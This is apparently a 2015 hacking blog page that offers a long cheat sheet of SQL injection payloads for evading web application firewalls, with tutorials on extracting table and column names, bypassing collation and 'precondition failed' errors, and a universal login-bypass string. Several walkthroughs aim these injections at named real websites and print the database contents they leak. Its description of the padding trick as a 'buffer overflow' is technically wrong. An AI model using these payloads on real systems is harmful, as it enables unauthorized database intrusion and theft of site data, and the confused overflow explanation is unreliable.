Saturday, April 25, 2015

byPassing Cheat Sheet Of ALL WAF



                                                  Cheat Sheet Of    UNION SELECT:::
This is The List of By Pass Union Select ::
----------------------------------------------------------------------------------------------------------------
  1. +union+distinct+select+
  2. +union+distinctROW+select+
  3. /**//*!12345UNION SELECT*//**/
  4. /**//*!50000UNION SELECT*//**/
  5. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  6. +/*!u%6eion*/+/*!se%6cect*/+
  7. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  8. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  9. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  10. union /*!50000%53elect*/
  11. %55nion %53elect
  12. +--+Union+--+Select+--+
  13. +UnIoN/*&a=*/SeLeCT/*&a=*/
  14. id=1+?UnI?On?+'SeL?ECT?
  15. id=1+'UnI'||'on'+SeLeCT'
  16. UnIoN SeLeCt CoNcAt(version())--
  17. uNiOn aLl sElEcT
  18. uUNIONnion all sSELECTelect 
  19. /*union*/union/*select*/select+1,2,3/*
  20. /*uniXon*/union/*selXect*/select+1,2/*
  21. un/**/ion+sel/**/ect
  22. +#1q%0Aunion all#qa%0A#%0Aselect
  23. union /*!select*/+
  24. union/**/select/**/
  25. /**/union/**/select/**/
  26. /**/union/*!50000select*/
  27. /**//*!12345UNION SELECT*//**/
  28. /**//*!50000UNION SELECT*//**/
  29. /**/uniUNIONon/**/selSELECTect/**/
  30. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  31. /**//*!union*//**//*!select*//**/
  32. /**/UNunionION/**/SELselectECT/**/
  33. /**//*UnIOn*//**//*SEleCt*//**/
  34. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  35. /**/UNunionION/**/all/**/SELselectECT/**/
  36. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. uni
  39. %20union%20/*!select*/%20
  40. union%23aa%0Aselect
  41. union+distinct+select+
  42. union+distinctROW+select+
  43. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  44. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  45. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  46. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  47. /*!u%6eion*/+/*!se%6cect*/+
  48. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  49. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  50. union /*!50000%53elect*/
  51. +%2F**/+Union/*!select*/
  52. %55nion %53elect
  53. +?+Union+?+Select+?+
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55. uNiOn aLl sElEcT
  56. uUNIONnion all sSELECTelect
  57. union(select(1),2,3)
  58. union (select 1111,2222,3333)
  59. union (/*!/**/ SeleCT */ 11)
  60. %0A%09UNION%0CSELECT%10NULL%
  61. /*!union*//*?*//*!all*//*?*//*!select*/
  62. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  63. union+sel%0bect
  64. +uni*on+sel*ect+
  65. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  66. union(select (1),(2),(3),(4),(5))
  67. UNION(SELECT(column)FROM(table))
  68. id=1+?UnI?On?+?SeL?ECT?
  69. id=1+?UnI?||?on?+SeLeCT?
  70. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  71. /*!00000Union*/ /*!00000Select*/
  72. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  73. %55nion %53elect
  74. %55nion(%53elect 1,2,3)-- -
  75. +union+distinct+select+
  76. +union+distinctROW+select+
  77. /**//*!12345UNION SELECT*//**/
  78. /**//*!50000UNION SELECT*//**/
  79. /**/UNION/**//*!50000SELECT*//**/
  80. /*!50000UniON SeLeCt*/
  81. union /*!50000%53elect*/
  82. + #?uNiOn + #?sEleCt
  83. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  84. /*!%55NiOn*/ /*!%53eLEct*/
  85. /*!u%6eion*/ /*!se%6cect*/
  86. +un/**/ion+se/**/lect
  87. uni%0bon+se%0blect
  88. %2f**%2funion%2f**%2fselect
  89. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  90. REVERSE(noinu)+REVERSE(tceles)
  91. /*--*/union/*--*/select/*--*/
  92. union (/*!/**/ SeleCT */ 1,2,3)
  93. /*!union*/+/*!select*/
  94. union+/*!select*/
  95. /**/union/**/select/**/
  96. /**/uNIon/**/sEleCt/**/
  97. +%2F**/+Union/*!select*/
  98. /**//*!union*//**//*!select*//**/
  99. /*!uNIOn*/ /*!SelECt*/
  100. +union+distinct+select+
  101. +union+distinctROW+select+
  102. uNiOn aLl sElEcT
  103. UNIunionON+SELselectECT
  104. /**/union/*!50000select*//**/
  105. 0%a0union%a0select%09
  106. %0Aunion%0Aselect%0A
  107. %55nion/**/%53elect
  108. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  109. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  110. %0A%09UNION%0CSELECT%10NULL%
  111. /*!union*//*--*//*!all*//*--*//*!select*/
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  113. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  114. +UnIoN/*&a=*/SeLeCT/*&a=*/
  115. union+sel%0bect
  116. +uni*on+sel*ect+
  117. +#1q%0Aunion all#qa%0A#%0Aselect
  118. union(select (1),(2),(3),(4),(5))
  119. UNION(SELECT(column)FROM(table))
  120. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  121. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  122. union(select(1),2,3)
  123. union (select 1111,2222,3333)
  124. uNioN (/*!/**/ SeleCT */ 11)
  125. union (select 1111,2222,3333)
  126. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  127. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  128. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  129. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  130. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  131. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  132. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  133. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  134. /union\sselect/g
  135. /union\s+select/i
  136. /*!UnIoN*/SeLeCT
  137. +UnIoN/*&a=*/SeLeCT/*&a=*/
  138. +uni>on+sel>ect+
  139. +(UnIoN)+(SelECT)+
  140. +(UnI)(oN)+(SeL)(EcT)
  141. +?UnI?On?+'SeL?ECT?
  142. +uni on+sel ect+
  143. +/*!UnIoN*/+/*!SeLeCt*/+
  144. /*!u%6eion*/ /*!se%6cect*/
  145. uni%20union%20/*!select*/%20
  146. union%23aa%0Aselect
  147. /**/union/*!50000select*/
  148. /^.*union.*$/ /^.*select.*$/
  149. /*union*/union/*select*/select+
  150. /*uni X on*/union/*sel X ect*/
  151. +un/**/ion+sel/**/ect+
  152. +UnIOn%0d%0aSeleCt%0d%0a
  153. UNION/*&test=1*/SELECT/*&pwn=2*/
  154. un?+un/**/ion+se/**/lect+
  155. +UNunionION+SEselectLECT+
  156. +uni%0bon+se%0blect+
  157. %252f%252a*/union%252f%252a /select%252f%252a*/
  158. /%2A%2A/union/%2A%2A/select/%2A%2A/
  159. %2f**%2funion%2f**%2fselect%2f**%2f
  160. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  161. /*!UnIoN*/SeLecT+
-----------------------------------------------------------------------------------------------------------------------
Union Select  by PASS with Url Encoded Method:
-----------------------------------------------------------------------------------------------------------------------
  1. %55nion(%53elect)
  2. union%20distinct%20select
  3. union%20%64istinctRO%57%20select
  4. union%2053elect
  5. %23?%0auion%20?%23?%0aselect
  6. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  7. %55nion %53eLEct
  8. u%6eion se%6cect
  9. unio%6e %73elect
  10. unio%6e%20%64istinc%74%20%73elect
  11. uni%6fn distinct%52OW s%65lect
  12. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

---------------------------------------------------------------------------------------------------------------------
Cheat Sheet of Bypassing Of Order by And Group By
---------------------------------------------------------------------------------------------------------------------

  1.  order by/**_**/
  2. /*!12345order*/ /*!12345by*/
  3. ) order by 1-- -
  4. ') order by 1-- -

  5. ')order by 1%23%23

  6. %')order by 1%23%23

  7. Null' order by 100--+

  8. Null' order by 9999--+

  9. ')group by 99-- -

  10. 'group by 119449-- -

  11. 'group/**/by/**/99%23%23
------------------------------------------------------------------------------------------------------------------------Concat And Group_concat By Pass cheat Sheet ::
------------------------------------------------------------------------------------------------------------------------


  1. /*!12345group_concat*/(/*!12345table_name*/)
  2. /*!50000group_concat*/(/*!50000table_name*/)
  3. /*!GrOuP_ConCaT*/()
  4. /*!12345GroUP_ConCat*/()
  5. /*!50000gRouP_cOnCaT*/()
  6. /*!50000Gr%6fuP_c%6fnCAT*/()
  7. /*!group_concat*/()
  8. gRoUp_cOnCAt()
  9. group_concat(/*!*/)
  10. group_concat(/*!12345table_name*/)
  11. group_concat(/*!50000table_name*/)
  12. /*!group_concat*/(/*!12345table_name*/)
  13. /*!group_concat*/(/*!50000table_name*/)
  14. unhex(hex(group_concat(table_name)))
  15. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  16. unhex(hex(/*!12345group_concat*/(table_name)))
  17. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  18. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  19. unhex(hex(/*!50000group_concat*/(table_name)))
  20. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  21. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  22. CONVERT(group_concat(table_name)+USING+latin1)
  23. CONVERT(group_concat(table_name)+USING+latin2)
  24. CONVERT(group_concat(table_name)+USING+latin3)
  25. CONVERT(group_concat(table_name)+USING+latin4)
  26. CONVERT(group_concat(table_name)+USING+latin5)
  27. convert(group_concat(table_name)+using+ascii)
  28. convert(group_concat(/*!table_name*/)+using+ascii)
  29. convert(group_concat(/*!12345table_name*/)+using+ascii)
  30. convert(group_concat(/*!50000table_name*/)+using+ascii)
  31. /*!concat_ws(0x3a,)*/
  32. concat_ws(0x3a3a3a,version()
  33. CONCAT_WS(CHAR(32,58,32),version(),)
----------------------------------------------------------------------------------------------------------------
How to By Pass Tables:::
---------------------------------------------------------------------------------------------------------------
group_concat(/*!table_name*/)

  1. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

  2. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()? 
  3. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
===========================================================
How to By Pass Columns:::
===========================================================
  1. group_concat(/*!column_name*/)
  2. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  3. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


========================================================================
URL enCoded By passing Table and columns::
===========================================================

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

========================================================================
illegal mix of Collations ByPass ::
========================================================================
bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

How To ByPass Precondition Failed In SQL injection



~~~~~~~~~~~~~With The Name Of ALLAH~~~~~~~~~~~~~~~~~~~~


Today we will Learn how to by Pass Precondition Failed in SQLI ..

Steps ::::

Lets Assume !!! :::

1-
www.site.com/php?id=1 order by 4--
2-
    www.site.com/php?id=-1 union select 1,2,3 --
  3-
    For example  2 is vlunerable Column::
now Going To perform Dios !!

4-
     www.site.com/php?id=-1 union select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,
0x3c6c693e,table_name,column_name)),@),3--

 Now Suppose It is showing us  Precondition Failed  


WAF byPass Method








----------------------------------------------------------------------------------------------------------------------
5-
  I test such Error  many Time ... When i Encode First character of  From Like that %66rom
it Works and Gives me Result ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

6-
 http://site.com/portfolio-detail.php?id=-11+ UNION SELECT 1,2,3,make_set(6,@:=0x0a,(/*!50000select*/(1) %66rom (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),5,6,7,8,9


We Have SuccessFully Bypassed This Precondition Failed WAF

Precondition Failed bypass













   :::::::::::::::::::::::::::::::Watch On Youtube::::::::::::::::::::::::::::::::::::::



------------------------------------------------------------------------------------------------------------------

AuthoR ::: MasOOD (Afghani)

Buffer overflows SQL Base injection



Today i am going to share with you how to By Pass Union select using Buffer overflows method.

What is Buffer Overflows::?
Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.
------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------

How To perForm ::
when we trying To inject a Site and at the Stage of union select we fail to bypass it ...
Then we use Buffer over Flow to bypass uion select. we Send much data that can over flow the memory of site.

When Overflow occurs it leaks some important data but in in case of SQL injection it will show us Vlunerable columns.

------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------
Assume the capacity of the Memory of site is
100 Characters.....So how can we Perform over flow By sending 100+ characters..
----------------------------------------------------------------------------------------------------------------------
www.site.com/php?id=1 union select 1,2,3--
union select by pass






WaF Detect our injection :
Lets Trying to Bypass it :
www.Site.com/php?id=1 /*!12345union*/ select 1,2,3

But this time Our Script is blocked by Hosting Team :D


buffer over flow





------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------

BY Passing Union Select By Buffer OverFlows ::

www.site.com/php?id=1 union %23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A select 1,2,3--
This time We have successfully by pass the Union select.....














-------------------------------------------------------------------------------------------------

Here We can use Any word ...Like ________ ,++++++++++,BBBBBBBBB ---

www.site.com/php?id=1 union %23+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%0A select 1,2,3--
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
                            :::::::::Watch  on Youtube :::::::::::::::::::


Author :: Masood (Afghani)

How To ByPass Illegal Mix Of Collations

How To ByPass Illegal Mix Of Collations

--------------------------------------------------------------------------------

                ::::::::Watch on Youtube :::::::::



-------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------

Solving this problem as an SQL Injector:


There are several ways you can bypass illegal mix of collations for operation 'union'.

using Cast function.
using convert function.
using HEX/ UNHEX functions.
using Compress/uncompress functions.
using encode/decode functions
using AES Encryption



Bypass illegal mix of collations with CAST function:


Once can bypass this error using CAST function.
cast() function inputs an expression of any type and give result value of given type
Syntax of cast()
Cast(Expression AS type)



http://website.com/page.php?id=1 union select 1,2,cast(@@version as binary)#


Bypass illegal mix of collations with AES_Encrypt() and AES_DECRYPT().


AES_ENCRYPT() AND AES_DECRYPT() can also be used to bypass this error.
AES_ENCRYPT() is used for impmenting ecnryption/decrypyion of given string using
Advance encryption Standard (AES). These functions ecnrypts with a 128 bit key lenght by default. AES_ENCRYPT uses that key with given string to encrypt that string and AES_DECRYPT() is used to decrypt that encrypted string with the key(which we set while encryption) to return the orignal string.

Syntax of AES_ENCRYPT() and AES_DECRYPT()

AES_ENCRYPT(given_string, key)
AES_DECRYPT(encrypted_string, key)

Bypass Example:

Suppose you are facing illegal mix of collations while fetching version() info,
lets take key as 1. your syntax would be like

http://website.com/page.php?id=1 union all select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),1),1)#


Bypass illegal mix of collations with Convert function


Convert() also takes an expression/string any character set and convert it into specified character set.

Syntax of Convert() function:
Convert(given_string USING required_char_set)
Example:

http://website.com/page.php?id=1 union all select 1,2,convert(@@version using ascii)#

Bypass illegal mix of collations using ENCODE(), DECODE()


ENCODE() is also an encryption function of MySQL, it works same like
AES_ENCRYPT(), taking a string and encoding it with a provided key.
And similarly DECODE() function will decode that encoded string by using the key we provided while encryption.


Syntax of ENCODE() and DECODE():
ENCODE('string', key)
DECODE('encoded string', key)

Real time Example 

http://website.com/page.php?id=1 union all select 1,2,decode(encode(@@version,1),1)#

Bypass illegal mix of collations with COMPRESS(), UNCOMPRESS() functions


Compress() functions compresses a string and give the result as  binary string.
and that compressed string can be uncompressed by uncompressed() function later.

Syntax of Compress() and Uncompress(): 
compress('given_string')
uncompress('compressed string')

Real Time Example:

http://website.com/page.php?id=1 union all select 1,2,uncompress(compress(@@version))# 

Bypass illegal mix of collations using HEX() and UNHEX() functions


HEX() functions take a string and results hexadecimal string representation of that given string with each character of given string converted in two hexadecimal digits and the UNHEX() reverse this hexadecimal string back to the Original string.
Syntax of Hex() and Unhex():
HEX('given string')
UNHEX('haxadecimal_of_string')

Real time Example:

http://website.com/page.php?id=1 union all select 1,2,unhex(hex(@@version))#

Auth0R ::: Ahsan Shabbir (God SQLI) 

Wednesday, April 22, 2015

NEW Tips and Tricks OF WAF bypass


WAF by Pass tricks



 New WAF Bypass Method


=======================================================================
                                                      WAF Bypass By Benzi
=======================================================================
Sup.

In the recent days, i get a lot of waf bypass requests, which the regular methods (/* , #\n , URL encoding etc) don't work on them.
so today i will write about some new methods to handle these kinda sites, and some other new stuff.
this time there will be no pics in this paper, only text.

TOC:

  • WAF bypass (\N , e , {})
  • DIOS in non-geometric error based
  • ABIOS 

WAF BYPASS: 

up to now, if we saw error like "403 forbidden", we didn't take it much seriously.
we just used one of the known bypass methods, and owned the website.
but recently, the WAFs are getting smarter and harder. but so do i

we will use this site for demonstrate.


Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=78
=======================================================================
I counted the columns using group by, and there are 16. So our query looks like that.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
=======================================================================
" Not Acceptable! This error was generated by Mod_Security "
Seems like mod_security is on. How can we bypass Mod_Security?usually /*!50000union*/ and distinct are doing the trick.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 /*!50000union*/ distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -
=======================================================================
No more Mod_Security, but now we got another WAF. That's the first trick i wanna show you today. As we can see, 'union' is being blocked. but how strongly? lets do some tests.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16 union
=======================================================================
403, union gets block. so maybe the 'e' trick will do?

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16e0union
=======================================================================
403, still blocked.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16aunion
=======================================================================
No 403, union not blocked. But how can we stick a letter to union, and not get 1064?
we can so that by use \N. It is case sensitive for NULL.lets try

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
=======================================================================
bypassed, column #10 on the screen. lets try to get the version.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16--
=======================================================================
403 again. seems like we cant directly put version() in the column. thats the second trick i wanna show you. usually, we would do something like (version()), but seems its also covered here. in mysql, theres something called "timestamp". basically, its defines the type of the string, like-
Code:
SELECT TIMESTAMP 'str';
the cool thing about it, its we can write it like that-
Code:
SELECT { ts column};
so we can use that to bypass WAFs, like that-

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,{f version()},11,12,13,14,15,16--
=======================================================================
boom, 5.5.40-36.1 .another thing i want to talk about today, is getting tables.so lets try to get tables.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from--
=======================================================================
403, WAF blocks from. lets try to stick a number to it.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16from--
=======================================================================
no waf.usually to stick a number to "from", we use 'e'. its forbbiden here, but theres another method.we can simply put dot before the number, and write anything after without space. its like 0.16 . so in our injection-

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from sometable--
=======================================================================
no waf. now when we srite "from information_schema.tables", we get modsecurity error. remember the timestamp thing? we can also do that with tables, so

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema.tables}--
=======================================================================
modsecurity - bypassed. 403 - not yet. as we can see, the combination of "schema.tables" is blocked. the usual ``,+,() not working, so we gotta think outside the box.we can mess with the query parser using 'e' again.when the webserver parsing the query, it use db.table.column format. in sql, information_schema 9.e.tables = information_schema.tables. so

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
=======================================================================
now for the table_name part.as before, we cant just write the column instead of column #10, so we gotta be creative. just like information_schema bypass, we can also use 'e' to mess with the parser with the columns. in columns, it goes like that  ``0.e.table_name = table_name, so

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,``0.e.table_name,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
=======================================================================
bypassed DIOS in non-geometric error based
something i also saw recently, is people trying to make dios in polygon. the problem of doing that, is unlike union, polygon is limited by the result , so we gotta "be cheap" to save space. even though the result is limited, its still larger than other error based outputs. the original DIOS query is this.

Code:

(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x)

p.s i remember when denjacker showed me that 3 years ago, i was absolutely amazed to see how far people can get, only by use a simple variable.lets go back to the tut. we will use this site to demonstrate.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=1
=======================================================================
lets check if we can use polygon.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)k)p))
=======================================================================
{ Qusers -  Error #1367: Illegal non geometric '(select `p`.`@@version` from (select '5.1.73-log' AS `@@version` from (select @@version AS `@@version`) `k`) `p`)' value found during parsing }

yes, we can. but as we can see, the output is very large, our dios will never fit in. the red part is the alias, which take a lot of space. lets try to save space, by give @@version a shorter alias, like 'a'.


Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version a)k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`a` from (select '5.1.73-log' AS `a` from (select a AS `a`) `k`) `p`)' value found during parsing }
shorter indeed. but can we reduce more? lets try give @@version an empty alias.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version``)k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `` from (select '5.1.73-log' AS `` from (select AS ``) `k`) `p`)' value found during parsing }

thats more like it. now lets try to put the dios syntax in our query.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x))k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select '' value found during parsing }

blank output. the 0x00 gets convert to real null byte, which "delete" our output. lets replace it by 0x01.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x203a20,table_name))))x))k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `(' value found during parsing }

lets get rid off the unnecessary things, and as before, give our output an empty alias

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select((select@''from(select@:=0x01 ​,(select@ from information_schema.tables where table_schema!='information_schema'and@:=concat(@,0x203a20,table_name)))p))'')f)x ​))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `` from (' value found during parsing }

and we got DIOS for non-geometric error based. Auth Bypass In One Shot sometimes we need to bypass some admin panels, and we do that using or 1=1. the problem is we dont know if we gotta use integer, one-quote string or double-quote string. but is it really matter?
lets check this query-

Code:
=======================================================================
or 1-- -' or 1 or '1"or 1 or"
=======================================================================
lets check any term of the above. if its integer, the url behind the query + our injection is like that.

SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''the "or 1-- -" 

gets active, make the condition true and ignores the rest of the query. now lets check regular string-

SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....

the "or 1" part make the query true, and the other parts are considered as the comparison strings. same with the double quotes.

SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " .....

wafs will always get tricky, the sqli section will continue to grow, and the human brain will provid more and more with less and less. thats my conclusion.
hope you learned something.
========================================================================

How To fix Live Http Header Reply button

 Live HTTP Header Fixed


===================================================================================
                                                                Reply Button Fixed
===================================================================================
                                 In the Name of ALLAH the Most Beneficent and the Merciful.
                                                               Assalam-o-Alaikom.

LiveHTTPHeader "Reply" Button Fixed.
By r0ot h3x49.

=========================================================================    How To Install?
=========================================================================1: 1st install add-on "live http headers" from Firefox
Here is Link :- Go Now



Click on  "Help" menu in browser





Click on "Troublshooting information"



















Click on "Show Folder" button













Open " Extensions" Folder






Open Folder  "{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a}"

Livehttp header






Open Folder  "Chrome"







Replace "livehttpheaders"  by the given patch and enjoy ...






Click Here To Download :- Download Now

Note:-

           "While You are replacing "livehttphears.rar" with this one close your Firefox Browser then replace it and then start and check"

Special Thnx to :---
                  Kazam Veeru <3 & Yogesh Bhagat <3

Gretz to :---
(Ashx khan , Rehan Manzoor , Mak Man , Janus Sloven , Anas Ali , Base64 , Behroz , Amir Dz , Zen bro , Dante bro and all my hacker Frnds... )

New Hack Bar Version (updated)

                                       Hack Bar New Version


===================================================================================
                                                                r0ot-k4jj1-v1.6.5
===================================================================================
                                 In the Name of ALLAH the Most Beneficent and the Merciful.
                                                               Assalam-o-Alaikom.

Hack Bar Version 1.6.5.
By r0oth3x49 & K44ji gujj4r.

=========================================================================     What's New?
=========================================================================1: Added Some Variable Method Queries.
